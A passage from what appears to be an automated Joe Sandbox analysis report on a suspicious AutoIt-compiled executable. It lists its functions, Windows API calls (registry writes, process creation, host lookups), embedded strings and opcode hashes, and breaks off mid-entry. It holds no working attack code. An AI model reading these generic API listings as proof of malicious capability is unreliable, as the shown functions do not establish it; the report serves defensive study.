                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Window$Foreground_memmove
                                                                                                                              • String ID: ACTIVE$ALL$CLASS$HANDLE$INSTANCE$LAST$REGEXPCLASS$REGEXPTITLE$TITLE
                                                                                                                              • API String ID: 3828923867-1919597938
                                                                                                                              • Opcode ID: 54b3f3b40c5b89cdf26fd376667d3e6e86dc47bfd6293804861efc44b372d1ac
                                                                                                                              • Instruction ID: e8c94077df00d6cdb51b399b87c5a83162210cbac17d88854e7615e2755f38c1
                                                                                                                              • Opcode Fuzzy Hash: 54b3f3b40c5b89cdf26fd376667d3e6e86dc47bfd6293804861efc44b372d1ac
                                                                                                                              • Instruction Fuzzy Hash: A4D11B30104B42EBCB08EF61D491EADBBF5BF64344F148A2DF455575A2CB30E99ACB92
                                                                                                                              Function 001D352A Relevance: 26.7, APIs: 9, Strings: 6, Instructions: 477registryCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 001D3626
                                                                                                                              • RegCreateKeyExW.KERNEL32(?,?,00000000,0020DBF0,00000000,?,00000000,?,?), ref: 001D3694
                                                                                                                              • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 001D36DC
                                                                                                                              • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 001D3765
                                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 001D3A85
                                                                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 001D3A92
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Close$ConnectCreateRegistryValue
                                                                                                                              • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                                                                              • API String ID: 536824911-966354055
                                                                                                                              • Opcode ID: b0435c3571df383c562bd0c6c6020b3ba984ba8b86ba765124d909111f03be7e
                                                                                                                              • Instruction ID: 9bab60e3d7f5a2a6bdf886df7c0e914ede0ffdf37cc30389cdcd7842cd4ad427
                                                                                                                              • Opcode Fuzzy Hash: b0435c3571df383c562bd0c6c6020b3ba984ba8b86ba765124d909111f03be7e
                                                                                                                              • Instruction Fuzzy Hash: 49024875200602AFCB14EF24C895E2AB7F5FF99320F058559F89A9B361DB70EE41CB42
                                                                                                                              Function 00174257 Relevance: 19.5, APIs: 4, Strings: 7, Instructions: 235COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\._cache_AYRASY.exe,00000104,?,00000000,00000001,00000000), ref: 0017428C
                                                                                                                                • Part of subcall function 0017CAEE: _memmove.LIBCMT ref: 0017CB2F
                                                                                                                                • Part of subcall function 00191BC7: __wcsicmp_l.LIBCMT ref: 00191C50
                                                                                                                              • _wcscpy.LIBCMT ref: 001743C0
                                                                                                                              • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\._cache_AYRASY.exe,00000104,?,?,?,?,00000000,CMDLINE,?,?,00000100,00000000,CMDLINE,?,?), ref: 001E214E
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: FileModuleName$__wcsicmp_l_memmove_wcscpy
                                                                                                                              • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$C:\Users\user\Desktop\._cache_AYRASY.exe$CMDLINE$CMDLINERAW
                                                                                                                              • API String ID: 861526374-3669391713
                                                                                                                              • Opcode ID: 6bf651cdb8b6b82121ea800e8d26e0c7b333f1f7ef52bfb40b612949d2cad665
                                                                                                                              • Instruction ID: a811bee5c95e32c7fb59b3b10f03f5e9827088ca38816a8d3d98b7dedb9deffd
                                                                                                                              • Opcode Fuzzy Hash: 6bf651cdb8b6b82121ea800e8d26e0c7b333f1f7ef52bfb40b612949d2cad665
                                                                                                                              • Instruction Fuzzy Hash: FB817072900219ABCB05EBE0DD56EEFB7BCAF25350F504019E54AB7082EB706B45CBA1
                                                                                                                              Function 0018E975 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 170COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0018EA39
                                                                                                                              • __wsplitpath.LIBCMT ref: 0018EA56
                                                                                                                                • Part of subcall function 0019297D: __wsplitpath_helper.LIBCMT ref: 001929BD
                                                                                                                              • _wcsncat.LIBCMT ref: 0018EA69
                                                                                                                              • __makepath.LIBCMT ref: 0018EA85
                                                                                                                                • Part of subcall function 00192BFF: __wmakepath_s.LIBCMT ref: 00192C13
                                                                                                                                • Part of subcall function 0019010A: std::exception::exception.LIBCMT ref: 0019013E
                                                                                                                                • Part of subcall function 0019010A: __CxxThrowException@8.LIBCMT ref: 00190153
                                                                                                                              • _wcscpy.LIBCMT ref: 0018EABE
                                                                                                                                • Part of subcall function 0018EB05: RegOpenKeyExW.KERNEL32(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,00000000,?,0018EADA,?,?), ref: 0018EB27
                                                                                                                              • _wcscat.LIBCMT ref: 001E32FC
                                                                                                                              • _wcscat.LIBCMT ref: 001E3334
                                                                                                                              • _wcsncpy.LIBCMT ref: 001E3370
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: _wcscat$Exception@8FileModuleNameOpenThrow__makepath__wmakepath_s__wsplitpath__wsplitpath_helper_wcscpy_wcsncat_wcsncpystd::exception::exception
                                                                                                                              • String ID: Include$\$"#
                                                                                                                              • API String ID: 1213536620-3510780041
                                                                                                                              • Opcode ID: 84a9e571a677dbbc8bec5a5c139bb8f4622696d56ed013570f2724484c9e0e9f
                                                                                                                              • Instruction ID: 53d7f902c028ed63876c30cbe478f72b0c0db24a99ed250c94534d42adac0de3
                                                                                                                              • Opcode Fuzzy Hash: 84a9e571a677dbbc8bec5a5c139bb8f4622696d56ed013570f2724484c9e0e9f
                                                                                                                              • Instruction Fuzzy Hash: 7D514BB2414380EBC719EF65FC89C9BB7F8FB59300B80496EF54583261EB749648CB66
                                                                                                                              Function 001B78EE Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72networkCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
                                                                                                                              • String ID: 0.0.0.0
                                                                                                                              • API String ID: 208665112-3771769585
                                                                                                                              • Opcode ID: bce607fd5b32110bce83f25eff4380c4661a32456c76913818235722d1a77175
                                                                                                                              • Instruction ID: d8912b8df0a11784c3e9565a134ab5c69144f62a6057499231cdf85584392d18
                                                                                                                              • Opcode Fuzzy Hash: bce607fd5b32110bce83f25eff4380c4661a32456c76913818235722d1a77175
                                                                                                                              • Instruction Fuzzy Hash: 01119071A08115AEDF24A760AC4AAFA77AC9B55728F0001A5F445961D1EB70DA818AA0
                                                                                                                              Function 001730A5 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 66windowregistryCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • GetSysColorBrush.USER32(0000000F), ref: 001730B0
                                                                                                                              • LoadCursorW.USER32(00000000,00007F00), ref: 001730BF
                                                                                                                              • LoadIconW.USER32(00000063), ref: 001730D5
                                                                                                                              • LoadIconW.USER32(000000A4), ref: 001730E7
                                                                                                                              • LoadIconW.USER32(000000A2), ref: 001730F9
                                                                                                                                • Part of subcall function 0017318A: LoadImageW.USER32(00170000,00000063,00000001,00000010,00000010,00000000), ref: 001731AE
                                                                                                                              • RegisterClassExW.USER32(?), ref: 00173167
                                                                                                                                • Part of subcall function 00172F58: GetSysColorBrush.USER32(0000000F), ref: 00172F8B
                                                                                                                                • Part of subcall function 00172F58: RegisterClassExW.USER32(00000030), ref: 00172FB5
                                                                                                                                • Part of subcall function 00172F58: RegisterClipboardFormatW.USER32(TaskbarCreated), ref: 00172FC6
                                                                                                                                • Part of subcall function 00172F58: LoadIconW.USER32(000000A9), ref: 00173009
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Load$Icon$Register$BrushClassColor$ClipboardCursorFormatImage
                                                                                                                              • String ID: #$0$AutoIt v3
                                                                                                                              • API String ID: 2880975755-4155596026
                                                                                                                              • Opcode ID: 8875d83b5305dc86cfd9c487e4f5d24c75bd0232f93967d6174a5848a437396e
                                                                                                                              • Instruction ID: 15b1589e0e9e9fecf7df901fd457ea71d1ad134cfe581ca537ade284a66de877
                                                                                                                              • Opcode Fuzzy Hash: 8875d83b5305dc86cfd9c487e4f5d24c75bd0232f93967d6174a5848a437396e
                                                                                                                              • Instruction Fuzzy Hash: 42213DB4E00304ABCB04DFA9FC4DA99BFF5FB48314F10822AE618A72A0D7758655DF91
                                                                                                                              Function 001CB74B Relevance: 15.3, APIs: 10, Instructions: 324fileCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • VariantInit.OLEAUT32(?), ref: 001CB777
                                                                                                                              • CoInitialize.OLE32(00000000), ref: 001CB7A4
                                                                                                                              • CoUninitialize.COMBASE ref: 001CB7AE
                                                                                                                              • GetRunningObjectTable.OLE32(00000000,?), ref: 001CB8AE
                                                                                                                              • SetErrorMode.KERNEL32(00000001,00000029), ref: 001CB9DB
                                                                                                                              • CoGetInstanceFromFile.COMBASE(00000000,?,00000000,00000015,00000002), ref: 001CBA0F
                                                                                                                              • CoGetObject.OLE32(?,00000000,001FD91C,?), ref: 001CBA32
                                                                                                                              • SetErrorMode.KERNEL32(00000000), ref: 001CBA45
                                                                                                                              • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 001CBAC5
                                                                                                                              • VariantClear.OLEAUT32(001FD91C), ref: 001CBAD5
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2395222682-0
                                                                                                                              • Opcode ID: 1c802abe90423de96caf452b4f4d1a7609aba2293d1792e84bbf703302c7a436
                                                                                                                              • Instruction ID: 3d3002a275ac9253aa792ee72c00ecb839c414f1f1697068b1f0a76e907120b4
                                                                                                                              • Opcode Fuzzy Hash: 1c802abe90423de96caf452b4f4d1a7609aba2293d1792e84bbf703302c7a436
                                                                                                                              • Instruction Fuzzy Hash: 5AC110B1608305AFC704DF68C885E6AB7E9BF99308F04491DF98ADB251DB71ED05CB92
                                                                                                                              Function 00172F58 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 53registrywindowclipboardCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • GetSysColorBrush.USER32(0000000F), ref: 00172F8B
                                                                                                                              • RegisterClassExW.USER32(00000030), ref: 00172FB5
                                                                                                                              • RegisterClipboardFormatW.USER32(TaskbarCreated), ref: 00172FC6
                                                                                                                              • LoadIconW.USER32(000000A9), ref: 00173009
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Register$BrushClassClipboardColorFormatIconLoad
                                                                                                                              • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                                                                              • API String ID: 975902462-1005189915
                                                                                                                              • Opcode ID: 3a20dddb9312a18984e5e2e519e3985ca70273e5e58133ce92233ff71bced2ef
                                                                                                                              • Instruction ID: e2c6ed8af00f437e90c74620b596af231e6f7301e6c3628a3f344599d09705c1
                                                                                                                              • Opcode Fuzzy Hash: 3a20dddb9312a18984e5e2e519e3985ca70273e5e58133ce92233ff71bced2ef
                                                                                                                              • Instruction Fuzzy Hash: B121C4B5900318AFEB00EFA4F889BEDBBF5FB08704F00421AF615A62A0D7B14594CF95
                                                                                                                              Function 001D23C5 Relevance: 13.9, APIs: 9, Instructions: 376processCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • _memset.LIBCMT ref: 001D23E6
                                                                                                                              • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 001D2579
                                                                                                                              • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 001D259D
                                                                                                                              • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 001D25DD
                                                                                                                              • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 001D25FF
                                                                                                                              • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 001D2760
                                                                                                                              • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 001D2792
                                                                                                                              • CloseHandle.KERNEL32(?), ref: 001D27C1
                                                                                                                              • CloseHandle.KERNEL32(?), ref: 001D2838
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 4090791747-0
                                                                                                                              • Opcode ID: 0a5c4dc97721e4717a560569cf0d4db2bbfd98a12fdf12f662f34a7c33af3b7e
                                                                                                                              • Instruction ID: 5d07feaa6fc43ef56a3aa39731d3b7b1515828cf8f1bfca5215f05dac1f08f64
                                                                                                                              • Opcode Fuzzy Hash: 0a5c4dc97721e4717a560569cf0d4db2bbfd98a12fdf12f662f34a7c33af3b7e
                                                                                                                              • Instruction Fuzzy Hash: 01D1AF31604301DFCB25EF24D891B6ABBE5AFA5314F14845EF8999B3A2DB30ED41CB52
                                                                                                                              Function 001CC8B7 Relevance: 12.7, APIs: 5, Strings: 2, Instructions: 401COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: NULL Pointer assignment$Not an Object type
                                                                                                                              • API String ID: 0-572801152
                                                                                                                              • Opcode ID: ae919de2b4d036816dce06e1f481b0ec058fedc30b6da62e702be3e3bb24f3b8
                                                                                                                              • Instruction ID: b217877638368a616642b6a1b3c7812080ec545f9121206e357eb82bceba2668
                                                                                                                              • Opcode Fuzzy Hash: ae919de2b4d036816dce06e1f481b0ec058fedc30b6da62e702be3e3bb24f3b8
                                                                                                                              • Instruction Fuzzy Hash: DCE19E71A00219ABDF14DFA8D885FEE77B9BF68354F14802DE949AB281E770DD41CB90
                                                                                                                              Function 001CBF80 Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 264COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Variant$ClearInit$_memset
                                                                                                                              • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                                                                                              • API String ID: 2862541840-625585964
                                                                                                                              • Opcode ID: 687b8acc0fef72bf528eccd417b402a478c88502c43c4e8305ef749ad404aa02
                                                                                                                              • Instruction ID: 182ade9704349fbf4aec1098f21a8fbce51f112f2507df363395f22c85f94f52
                                                                                                                              • Opcode Fuzzy Hash: 687b8acc0fef72bf528eccd417b402a478c88502c43c4e8305ef749ad404aa02
                                                                                                                              • Instruction Fuzzy Hash: A5918A71A00219EBCB24DFA5D844FAEBBB8AF65710F14815DF919AB281D770DE41CFA0
                                                                                                                              Function 0018EB05 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 73registryCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • RegOpenKeyExW.KERNEL32(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,00000000,?,0018EADA,?,?), ref: 0018EB27
                                                                                                                              • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?,?,0018EADA,?,?), ref: 001E4B26
                                                                                                                              • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000,?,?,0018EADA,?,?), ref: 001E4B65
                                                                                                                              • RegCloseKey.ADVAPI32(?,?,0018EADA,?,?), ref: 001E4B94
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: QueryValue$CloseOpen
                                                                                                                              • String ID: Include$Software\AutoIt v3\AutoIt
                                                                                                                              • API String ID: 1586453840-614718249
                                                                                                                              • Opcode ID: 35550325db39feacb0e7321e0b5a53222dbbfe20d23270946b081e539c72b7f6
